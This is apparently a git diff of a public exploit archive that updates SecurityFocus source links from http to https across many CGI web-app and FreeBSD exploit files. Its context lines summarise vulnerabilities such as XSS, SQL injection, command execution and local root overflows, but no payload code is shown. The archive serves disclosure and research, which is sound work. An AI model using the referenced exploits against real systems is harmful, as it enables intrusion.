--git a/exploits/cgi/webapps/32746.txt b/exploits/cgi/webapps/32746.txt index b8a1a2b3e..c8103fc20 100644 --- a/exploits/cgi/webapps/32746.txt +++ b/exploits/cgi/webapps/32746.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33365/info +source: https://www.securityfocus.com/bid/33365/info MoinMoin is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/cgi/webapps/32768.pl b/exploits/cgi/webapps/32768.pl index f3f382cf7..e17be8288 100755 --- a/exploits/cgi/webapps/32768.pl +++ b/exploits/cgi/webapps/32768.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33525/info +source: https://www.securityfocus.com/bid/33525/info PerlSoft Gästebuch is prone to a vulnerability that attackers can leverage to execute arbitrary commands. This issue occurs because the application fails to adequately sanitize user-supplied input. Note that an attacker must have administrative access to the script to exploit this issue. diff --git a/exploits/cgi/webapps/32870.txt b/exploits/cgi/webapps/32870.txt index eb1017e47..623f7449b 100644 --- a/exploits/cgi/webapps/32870.txt +++ b/exploits/cgi/webapps/32870.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34159/info +source: https://www.securityfocus.com/bid/34159/info AWStats is prone to a path-disclosure vulnerability. diff --git a/exploits/cgi/webapps/32907.txt b/exploits/cgi/webapps/32907.txt index dd5b8214f..e1e62c566 100644 --- a/exploits/cgi/webapps/32907.txt +++ b/exploits/cgi/webapps/32907.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34507/info +source: https://www.securityfocus.com/bid/34507/info Banshee DAAP Extension is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/33231.txt b/exploits/cgi/webapps/33231.txt index 5a807a0ea..2d66bf79c 100644 --- a/exploits/cgi/webapps/33231.txt +++ b/exploits/cgi/webapps/33231.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36450/info +source: https://www.securityfocus.com/bid/36450/info Avaya Intuity Audix LX is prone to multiple remote vulnerabilities, including: diff --git a/exploits/cgi/webapps/33958.txt b/exploits/cgi/webapps/33958.txt index a4cd8b303..409a8bafe 100644 --- a/exploits/cgi/webapps/33958.txt +++ b/exploits/cgi/webapps/33958.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39988/info +source: https://www.securityfocus.com/bid/39988/info Publique! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/cgi/webapps/34080.txt b/exploits/cgi/webapps/34080.txt index c36c58c23..f2035d2ec 100644 --- a/exploits/cgi/webapps/34080.txt +++ b/exploits/cgi/webapps/34080.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/40549/info +source: https://www.securityfocus.com/bid/40549/info MoinMoin is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/cgi/webapps/34223.txt b/exploits/cgi/webapps/34223.txt index 73e94acb4..80c69eb0e 100644 --- a/exploits/cgi/webapps/34223.txt +++ b/exploits/cgi/webapps/34223.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41228/info +source: https://www.securityfocus.com/bid/41228/info Miyabi CGI Tools is prone to a vulnerability that attackers can leverage to execute arbitrary commands in the context of the application. This issue occurs because the application fails to adequately sanitize user-supplied input. diff --git a/exploits/cgi/webapps/34347.txt b/exploits/cgi/webapps/34347.txt index e1d35d535..74cbaacce 100644 --- a/exploits/cgi/webapps/34347.txt +++ b/exploits/cgi/webapps/34347.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41768/info +source: https://www.securityfocus.com/bid/41768/info iOffice is prone to a remote command-execution vulnerability because the software fails to adequately sanitize user-supplied input. diff --git a/exploits/cgi/webapps/34794.txt b/exploits/cgi/webapps/34794.txt index 82e33dbe4..9af2df668 100644 --- a/exploits/cgi/webapps/34794.txt +++ b/exploits/cgi/webapps/34794.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/43636/info +source: https://www.securityfocus.com/bid/43636/info Intellicom Netbiter webSCADA products are prone to multiple remote security vulnerabilities, including a directory-traversal vulnerability, an information-disclosure vulnerability, and an arbitrary-file-upload vulnerability. diff --git a/exploits/cgi/webapps/34994.txt b/exploits/cgi/webapps/34994.txt index 901dfc672..8d74387f4 100644 --- a/exploits/cgi/webapps/34994.txt +++ b/exploits/cgi/webapps/34994.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44843/info +source: https://www.securityfocus.com/bid/44843/info OpenWrt is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/35008.txt b/exploits/cgi/webapps/35008.txt index 860e8cf51..6840880a1 100644 --- a/exploits/cgi/webapps/35008.txt +++ b/exploits/cgi/webapps/35008.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45000/info +source: https://www.securityfocus.com/bid/45000/info Hot Links SQL is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/cgi/webapps/35015.txt b/exploits/cgi/webapps/35015.txt index 98039fb49..b32cc25d1 100644 --- a/exploits/cgi/webapps/35015.txt +++ b/exploits/cgi/webapps/35015.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45040/info +source: https://www.securityfocus.com/bid/45040/info SimpLISTic SQL is prone to a cross-site-scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/35035.txt b/exploits/cgi/webapps/35035.txt index 0606ad9c2..18471f7c6 100644 --- a/exploits/cgi/webapps/35035.txt +++ b/exploits/cgi/webapps/35035.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45123/info +source: https://www.securityfocus.com/bid/45123/info Awstats is prone to an arbitrary command-execution vulnerability. This issue occurs when Awstats is used along with Apache Tomcat in Microsoft Windows. diff --git a/exploits/cgi/webapps/35085.txt b/exploits/cgi/webapps/35085.txt index 21d8854af..d4b542acb 100644 --- a/exploits/cgi/webapps/35085.txt +++ b/exploits/cgi/webapps/35085.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45303/info +source: https://www.securityfocus.com/bid/45303/info WWWThread is prone to a cross-site-scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/35093.txt b/exploits/cgi/webapps/35093.txt index ff4ae1ac1..0609d730b 100644 --- a/exploits/cgi/webapps/35093.txt +++ b/exploits/cgi/webapps/35093.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45342/info +source: https://www.securityfocus.com/bid/45342/info BizDir is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/35438.txt b/exploits/cgi/webapps/35438.txt index b33c20fd7..82f650c59 100644 --- a/exploits/cgi/webapps/35438.txt +++ b/exploits/cgi/webapps/35438.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46828/info +source: https://www.securityfocus.com/bid/46828/info CosmoShop is prone to multiple cross-site scripting vulnerabilities and an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/cgi/webapps/35676.txt b/exploits/cgi/webapps/35676.txt index e34679e3c..8c665c684 100644 --- a/exploits/cgi/webapps/35676.txt +++ b/exploits/cgi/webapps/35676.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47628/info +source: https://www.securityfocus.com/bid/47628/info BackupPC is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/cgi/webapps/35698.txt b/exploits/cgi/webapps/35698.txt index 2974755c7..2be0b93f8 100644 --- a/exploits/cgi/webapps/35698.txt +++ b/exploits/cgi/webapps/35698.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47687/info +source: https://www.securityfocus.com/bid/47687/info Proofpoint Protection Server is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/cgi/webapps/35802.txt b/exploits/cgi/webapps/35802.txt index 3de946be0..6eb07aeb9 100644 --- a/exploits/cgi/webapps/35802.txt +++ b/exploits/cgi/webapps/35802.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48009/info +source: https://www.securityfocus.com/bid/48009/info Blackboard Learn is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/cgi/webapps/36457.txt b/exploits/cgi/webapps/36457.txt index 8cb413e2a..9b955321f 100644 --- a/exploits/cgi/webapps/36457.txt +++ b/exploits/cgi/webapps/36457.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51085/info +source: https://www.securityfocus.com/bid/51085/info Websense Triton is prone to a cross-site scripting vulnerability. diff --git a/exploits/cgi/webapps/36458.txt b/exploits/cgi/webapps/36458.txt index 35259b0d7..1c3e4a6a0 100644 --- a/exploits/cgi/webapps/36458.txt +++ b/exploits/cgi/webapps/36458.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51086/info +source: https://www.securityfocus.com/bid/51086/info Websense Triton is prone to a remote command-execution vulnerability. diff --git a/exploits/cgi/webapps/36459.txt b/exploits/cgi/webapps/36459.txt index ca2a6af6b..7ebc32352 100644 --- a/exploits/cgi/webapps/36459.txt +++ b/exploits/cgi/webapps/36459.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51087/info +source: https://www.securityfocus.com/bid/51087/info Multiple Websense products are prone to an authentication-bypass vulnerability. diff --git a/exploits/cgi/webapps/36772.txt b/exploits/cgi/webapps/36772.txt index 3f15c380b..9449d65c2 100644 --- a/exploits/cgi/webapps/36772.txt +++ b/exploits/cgi/webapps/36772.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51995/info +source: https://www.securityfocus.com/bid/51995/info EditWrxLite CMS is prone to a remote command-execution vulnerability. diff --git a/exploits/cgi/webapps/36974.txt b/exploits/cgi/webapps/36974.txt index 6a0caa6a6..1089657c7 100644 --- a/exploits/cgi/webapps/36974.txt +++ b/exploits/cgi/webapps/36974.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52627/info +source: https://www.securityfocus.com/bid/52627/info WebGlimpse is prone to a remote command-injection vulnerability. diff --git a/exploits/cgi/webapps/36976.txt b/exploits/cgi/webapps/36976.txt index 7bfc8f5d5..42c745f45 100644 --- a/exploits/cgi/webapps/36976.txt +++ b/exploits/cgi/webapps/36976.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52646/info +source: https://www.securityfocus.com/bid/52646/info WebGlimpse is prone to a path-disclosure vulnerability. diff --git a/exploits/cgi/webapps/36994.txt b/exploits/cgi/webapps/36994.txt index caf33f977..e49bc2bea 100644 --- a/exploits/cgi/webapps/36994.txt +++ b/exploits/cgi/webapps/36994.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52651/info +source: https://www.securityfocus.com/bid/52651/info WebGlimpse is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/37084.txt b/exploits/cgi/webapps/37084.txt index 9d532ae65..13520b38d 100644 --- a/exploits/cgi/webapps/37084.txt +++ b/exploits/cgi/webapps/37084.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/53032/info +source: https://www.securityfocus.com/bid/53032/info Munin is prone to a remote command-injection vulnerability. diff --git a/exploits/cgi/webapps/37549.txt b/exploits/cgi/webapps/37549.txt index e9df6b126..0456d915b 100644 --- a/exploits/cgi/webapps/37549.txt +++ b/exploits/cgi/webapps/37549.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54727/info +source: https://www.securityfocus.com/bid/54727/info Scrutinizer is prone to an authentication-bypass vulnerability. diff --git a/exploits/cgi/webapps/37638.txt b/exploits/cgi/webapps/37638.txt index d2f3f3b23..18e4875eb 100644 --- a/exploits/cgi/webapps/37638.txt +++ b/exploits/cgi/webapps/37638.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55082/info +source: https://www.securityfocus.com/bid/55082/info LISTSERV is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/37806.txt b/exploits/cgi/webapps/37806.txt index a8b80494a..ff6762509 100644 --- a/exploits/cgi/webapps/37806.txt +++ b/exploits/cgi/webapps/37806.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55589/info +source: https://www.securityfocus.com/bid/55589/info AxisInternet VoIP Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/cgi/webapps/37830.txt b/exploits/cgi/webapps/37830.txt index 6418980d1..e7d6f0f65 100644 --- a/exploits/cgi/webapps/37830.txt +++ b/exploits/cgi/webapps/37830.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55638/info +source: https://www.securityfocus.com/bid/55638/info ZEN Load Balancer is prone to the following security vulnerabilities: diff --git a/exploits/cgi/webapps/38114.html b/exploits/cgi/webapps/38114.html index b9217c1d8..b9bfea1f1 100644 --- a/exploits/cgi/webapps/38114.html +++ b/exploits/cgi/webapps/38114.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/56881/info +source: https://www.securityfocus.com/bid/56881/info Smartphone Pentest Framework is prone to multiple remote command-execution vulnerabilities. diff --git a/exploits/cgi/webapps/38550.txt b/exploits/cgi/webapps/38550.txt index 73958939f..3fcb26d05 100644 --- a/exploits/cgi/webapps/38550.txt +++ b/exploits/cgi/webapps/38550.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/60354/info +source: https://www.securityfocus.com/bid/60354/info QNAP VioStor NVR and QNAP NAS are prone to a remote code-execution vulnerability. diff --git a/exploits/cgi/webapps/38593.txt b/exploits/cgi/webapps/38593.txt index e499792c8..18a7e5353 100644 --- a/exploits/cgi/webapps/38593.txt +++ b/exploits/cgi/webapps/38593.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/60760/info +source: https://www.securityfocus.com/bid/60760/info FtpLocate is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/38691.txt b/exploits/cgi/webapps/38691.txt index 073912140..171d38afb 100644 --- a/exploits/cgi/webapps/38691.txt +++ b/exploits/cgi/webapps/38691.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/61728/info +source: https://www.securityfocus.com/bid/61728/info Kwok Information Server is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/cgi/webapps/38806.txt b/exploits/cgi/webapps/38806.txt index e389ae38f..15341e2c4 100644 --- a/exploits/cgi/webapps/38806.txt +++ b/exploits/cgi/webapps/38806.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/63204/info +source: https://www.securityfocus.com/bid/63204/info Bugzilla is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/cgi/webapps/38807.txt b/exploits/cgi/webapps/38807.txt index a45d3a8e5..ea495daf2 100644 --- a/exploits/cgi/webapps/38807.txt +++ b/exploits/cgi/webapps/38807.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/63205/info +source: https://www.securityfocus.com/bid/63205/info Bugzilla is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/cgi/webapps/38882.txt b/exploits/cgi/webapps/38882.txt index 3c49f15cb..fed15e9bb 100644 --- a/exploits/cgi/webapps/38882.txt +++ b/exploits/cgi/webapps/38882.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/64363/info +source: https://www.securityfocus.com/bid/64363/info Icinga is prone to multiple memory-corruption vulnerabilities due to an off-by-one condition. diff --git a/exploits/cgi/webapps/39127.txt b/exploits/cgi/webapps/39127.txt index 158413180..54795b47b 100644 --- a/exploits/cgi/webapps/39127.txt +++ b/exploits/cgi/webapps/39127.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/66367/info +source: https://www.securityfocus.com/bid/66367/info innoEDIT is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/cgi/webapps/39130.txt b/exploits/cgi/webapps/39130.txt index b83f6b87f..9ca93c95b 100644 --- a/exploits/cgi/webapps/39130.txt +++ b/exploits/cgi/webapps/39130.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/66487/info +source: https://www.securityfocus.com/bid/66487/info DotItYourself is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/cgi/webapps/39131.txt b/exploits/cgi/webapps/39131.txt index c7e0a48a3..d5f8bc3c2 100644 --- a/exploits/cgi/webapps/39131.txt +++ b/exploits/cgi/webapps/39131.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/66489/info +source: https://www.securityfocus.com/bid/66489/info Beheer Systeem is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/cgi/webapps/39137.txt b/exploits/cgi/webapps/39137.txt index 673f3fdbb..83215bac4 100644 --- a/exploits/cgi/webapps/39137.txt +++ b/exploits/cgi/webapps/39137.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/66549/info +source: https://www.securityfocus.com/bid/66549/info Primo Interactive CMS is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/cgi/webapps/39145.txt b/exploits/cgi/webapps/39145.txt index c2b474923..b752b7a48 100644 --- a/exploits/cgi/webapps/39145.txt +++ b/exploits/cgi/webapps/39145.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/66819/info +source: https://www.securityfocus.com/bid/66819/info Xangati XSR And XNR are prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/cgi/webapps/39156.txt b/exploits/cgi/webapps/39156.txt index 048516863..54e340153 100644 --- a/exploits/cgi/webapps/39156.txt +++ b/exploits/cgi/webapps/39156.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/67215/info +source: https://www.securityfocus.com/bid/67215/info ZamFoo is prone to multiple remote command-execution vulnerabilities. diff --git a/exploits/cgi/webapps/772.c b/exploits/cgi/webapps/772.c index 0da383244..b6211e5bf 100644 --- a/exploits/cgi/webapps/772.c +++ b/exploits/cgi/webapps/772.c @@ -1,4 +1,4 @@ - /* +/* AwStats exploit by Thunder, molnar_rcs@yahoo.com This exploit makes use of the remote command execution bug discovered in diff --git a/exploits/freebsd/dos/19130.c b/exploits/freebsd/dos/19130.c index c046c3f99..652a1a8ed 100644 --- a/exploits/freebsd/dos/19130.c +++ b/exploits/freebsd/dos/19130.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/168/info +source: https://www.securityfocus.com/bid/168/info A vulnerability in FreeBSD's UNIX-domain protocol implementation of file descriptor passing can cause the kernel to panic. */ diff --git a/exploits/freebsd/dos/19505.c b/exploits/freebsd/dos/19505.c index a67a5412f..f37b6dcc5 100644 --- a/exploits/freebsd/dos/19505.c +++ b/exploits/freebsd/dos/19505.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/653/info +// source: https://www.securityfocus.com/bid/653/info A vulnerability exists in FreeBSD's new VFS cache introduced in version 3.0 that allows a local and possibly remote user to force the kernel to consume large quantities of wired memory thus creating a denial of service condition. The new VFS cache has no way to purge entries from memory while the file is open, consuming wired memory and allowing for the denial of service (memory that cannot be swapped out). diff --git a/exploits/freebsd/dos/19687.c b/exploits/freebsd/dos/19687.c index 7163af360..acc1e61ea 100644 --- a/exploits/freebsd/dos/19687.c +++ b/exploits/freebsd/dos/19687.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/888/info +// source: https://www.securityfocus.com/bid/888/info RealServer 5.0 can be crashed by sending an overly long (4082+ bytes) ramgen request. Regular functionality can be restored by restarting the RealServer software. diff --git a/exploits/freebsd/dos/21512.txt b/exploits/freebsd/dos/21512.txt index 7d994e127..9a49e67a4 100644 --- a/exploits/freebsd/dos/21512.txt +++ b/exploits/freebsd/dos/21512.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4935/info +source: https://www.securityfocus.com/bid/4935/info slurp is a freely available, open source NNTP client. It is designed for use on most Unix and Linux operating systems. diff --git a/exploits/freebsd/dos/22831.pl b/exploits/freebsd/dos/22831.pl index 49278e28f..9c3ff20de 100755 --- a/exploits/freebsd/dos/22831.pl +++ b/exploits/freebsd/dos/22831.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8022/info +source: https://www.securityfocus.com/bid/8022/info GKrellMd has been reported prone to a remote buffer overflow vulnerability, arbitrary code execution is possible. diff --git a/exploits/freebsd/dos/23540.c b/exploits/freebsd/dos/23540.c index 965886d25..19c49aa93 100644 --- a/exploits/freebsd/dos/23540.c +++ b/exploits/freebsd/dos/23540.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9417/info +// source: https://www.securityfocus.com/bid/9417/info It has been reported that it may be possible for attackers to remotely delete security associations (SAs) in hosts running the KAME IKE daemon Racoon. diff --git a/exploits/freebsd/dos/24233.c b/exploits/freebsd/dos/24233.c index ba2d9a64e..7d627ed50 100644 --- a/exploits/freebsd/dos/24233.c +++ b/exploits/freebsd/dos/24233.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/10596/info +source: https://www.securityfocus.com/bid/10596/info It is reported that FreeBSD running on the Alpha architecture is susceptible to a denial of service vulnerability in its execve() system call. diff --git a/exploits/freebsd/dos/28648.c b/exploits/freebsd/dos/28648.c index 5f009d8cd..a8b18642c 100644 --- a/exploits/freebsd/dos/28648.c +++ b/exploits/freebsd/dos/28648.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20158/info +// source: https://www.securityfocus.com/bid/20158/info FreeBSD is prone to multiple local denial-of-service vulnerabilities. These issues occur because of input-validation flaws related to the handling of integers. diff --git a/exploits/freebsd/dos/28812.c b/exploits/freebsd/dos/28812.c index 1c59cf292..21180ccb8 100644 --- a/exploits/freebsd/dos/28812.c +++ b/exploits/freebsd/dos/28812.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20517/info +// source: https://www.securityfocus.com/bid/20517/info FreeBSD is prone to a local denial-of-service vulnerability because the kernel fails to require superuser privileges to perform a sensitive operation. diff --git a/exploits/freebsd/dos/28813.c b/exploits/freebsd/dos/28813.c index f8f818ef1..fbe34b04e 100644 --- a/exploits/freebsd/dos/28813.c +++ b/exploits/freebsd/dos/28813.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20522/info +// source: https://www.securityfocus.com/bid/20522/info FreeBSD is prone to a local denial-of-service vulnerability because it fails to handle exceptional conditions. diff --git a/exploits/freebsd/local/19346.c b/exploits/freebsd/local/19346.c index 8791d8038..0609cb54c 100644 --- a/exploits/freebsd/local/19346.c +++ b/exploits/freebsd/local/19346.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/456/info +// source: https://www.securityfocus.com/bid/456/info Solaris 2.6 and many other unices/clones have a serious problem with their unix domain socket implementation that has it's origins in old BSD code. Any unix socket created by any application is set mode 4777. In Solaris versions 2.5 and earlier, the permissions were ignored completely. The applications are vulnerable to being connected to and written to by anyone. This could lead to a whole number of application-specific security compromises. diff --git a/exploits/freebsd/local/19504.c b/exploits/freebsd/local/19504.c index 8f99180d7..37ddcd0a1 100644 --- a/exploits/freebsd/local/19504.c +++ b/exploits/freebsd/local/19504.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/651/info +// source: https://www.securityfocus.com/bid/651/info Under systems that allow the user to change his GECOS field from the password file and do not limit its length cfingerd is vulnerable to a local root (or nobody) buffer overflow. By setting a carefully designed GECOS field it is possible to execute arbitrary code with root (or nobody ) privileges. diff --git a/exploits/freebsd/local/19609.txt b/exploits/freebsd/local/19609.txt index 34403f9f6..5b75b1512 100644 --- a/exploits/freebsd/local/19609.txt +++ b/exploits/freebsd/local/19609.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/780/info +source: https://www.securityfocus.com/bid/780/info Seyon uses relative pathnames to spawn two other programs which it requires. It is possible to exploit this vulnerability to obtain the priviliges which seyon runs with. It is installed (by default) setgid dialer on FreeBSD and root on Irix. diff --git a/exploits/freebsd/local/19649.c b/exploits/freebsd/local/19649.c index 18556e909..527310790 100644 --- a/exploits/freebsd/local/19649.c +++ b/exploits/freebsd/local/19649.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/834/info +// source: https://www.securityfocus.com/bid/834/info There is a buffer overflow vulnerability known to be present in the version of gdc shipped with the 3.3-RELEASE version of FreeBSD. By default, only users in group wheel have execute access to gdc. The overflow occurs when the argument passed along with the -t flag (time) exceeds its predefined buffer length. It is possible to then corrupt the stack and alter the flow of execution (and execute arbitrary code). With gdc setuid root by default, this can lead to a local root compromise if exploited by users who have or gain access of or belong to the wheel group (or trusted gated group). diff --git a/exploits/freebsd/local/19650.txt b/exploits/freebsd/local/19650.txt index 77b4aa5df..2dddfc34a 100644 --- a/exploits/freebsd/local/19650.txt +++ b/exploits/freebsd/local/19650.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/835/info +source: https://www.securityfocus.com/bid/835/info It is possible to write debug ouput from gdc to a file (/var/tmp/gdb_dump). Unfortunately, gdc follows symbolic links which can be created in tmp and will overwrite any file on the system thanks to it being setiud root. This does not cause any immediate compromises and is more of a denial of service attack since it does not change the permissions of the overwritten files (to say, world writeable or group writeable). Local users are required to be in group wheel (or equivelent) to execute gdc. diff --git a/exploits/freebsd/local/19651.txt b/exploits/freebsd/local/19651.txt index 62858eb82..e72a96b03 100644 --- a/exploits/freebsd/local/19651.txt +++ b/exploits/freebsd/local/19651.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/838/info +source: https://www.securityfocus.com/bid/838/info FreeBSD 3.3-RELEASE ships with Seyon, a communications program which is known to have several vulnerabilities which can allow for a malicious user to elevate priviliges. The vulnerability, however, is that seyon is still installed setgid dialer in FreeBSD. When seyon is exploited, a local user can grant him/herself priviliges which allow access to the communications devices or anything else accessable by the group dialer. diff --git a/exploits/freebsd/local/19652.c b/exploits/freebsd/local/19652.c index fe9d71ecf..44f1ba3c0 100644 --- a/exploits/freebsd/local/19652.c +++ b/exploits/freebsd/local/19652.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/839/info +source: https://www.securityfocus.com/bid/839/info The version of xmindpath shipped with FreeBSD 3.3 can be locally exploited via overrunning a buffer of predefined length. It is possible to gain the effective userid of uucp through this vulnerability. It may be possible, after attaining uucp priviliges, to modify binaries to which uucp has write access to and trojan them to further elevate priviliges), ie: modify minicom so that when root runs it, drops a suid shell somewhere. */ diff --git a/exploits/freebsd/local/19653.c b/exploits/freebsd/local/19653.c index fce5ca0f4..7ffc7f16e 100644 --- a/exploits/freebsd/local/19653.c +++ b/exploits/freebsd/local/19653.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/840/info +// source: https://www.securityfocus.com/bid/840/info The version angband shipped with FreeBSD 3.3-RELEASE is vulnerable to a local buffer overflow attack. Since it is setgid games, a compromise of files and directories owned by group games is possible. diff --git a/exploits/freebsd/local/19685.txt b/exploits/freebsd/local/19685.txt index 28c8edde3..2dacd022f 100644 --- a/exploits/freebsd/local/19685.txt +++ b/exploits/freebsd/local/19685.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/885/info +source: https://www.securityfocus.com/bid/885/info WMMon is a multiple platform Window Maker docking application. It monitors useful system information such as CPU load and disk activity. The application also allows the user to define commands that can be launched by mouse clicks in the WMMon window. If the WMMon application is installed SUID or SGID, these privileges are not dropped before executing commands that have been defined by the user. Since the user can configure the application to execute any command, a user can run a shell or any other executable with the privileges that WMMon has been installed with. The FreeBSD ports version of WMMon installs SGID kmem and older versions installed it as SUID root. diff --git a/exploits/freebsd/local/19756.txt b/exploits/freebsd/local/19756.txt index d2edcc339..a2af71e21 100644 --- a/exploits/freebsd/local/19756.txt +++ b/exploits/freebsd/local/19756.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/996/info +source: https://www.securityfocus.com/bid/996/info A vulnerability exists in both the ascpu and asmon ports to FreeBSD. Ascpu and asmon are applets for the popular window manager AfterStep. They retain the look and feel of this window manager, and integrate well in to it's "dock" toolbar. As part of the port to FreeBSD, it was deemed necessary to give them access to /dev/kmem, necessitating them being installed setgid kmem. By passing a command line option, it is possible for an attacker to cause these applications to execute arbitrary commands with group 'kmem' privileges. diff --git a/exploits/freebsd/local/20377.c b/exploits/freebsd/local/20377.c index 1ae680de1..441a06c1d 100644 --- a/exploits/freebsd/local/20377.c +++ b/exploits/freebsd/local/20377.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1895/info +source: https://www.securityfocus.com/bid/1895/info top is a program used to display system usage statistics in real time written by GoupSys Consulting but shipped by default as a core component with many operating systems. On BSD systems, top is installed setgid kmem so that it may read process information from kernel memory if executed by a user who does not have that privilege. diff --git a/exploits/freebsd/local/21114.txt b/exploits/freebsd/local/21114.txt index 81496d8ad..ff75f7ec9 100644 --- a/exploits/freebsd/local/21114.txt +++ b/exploits/freebsd/local/21114.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3344/info +source: https://www.securityfocus.com/bid/3344/info FreeBSD is a freely available, open source implementation of 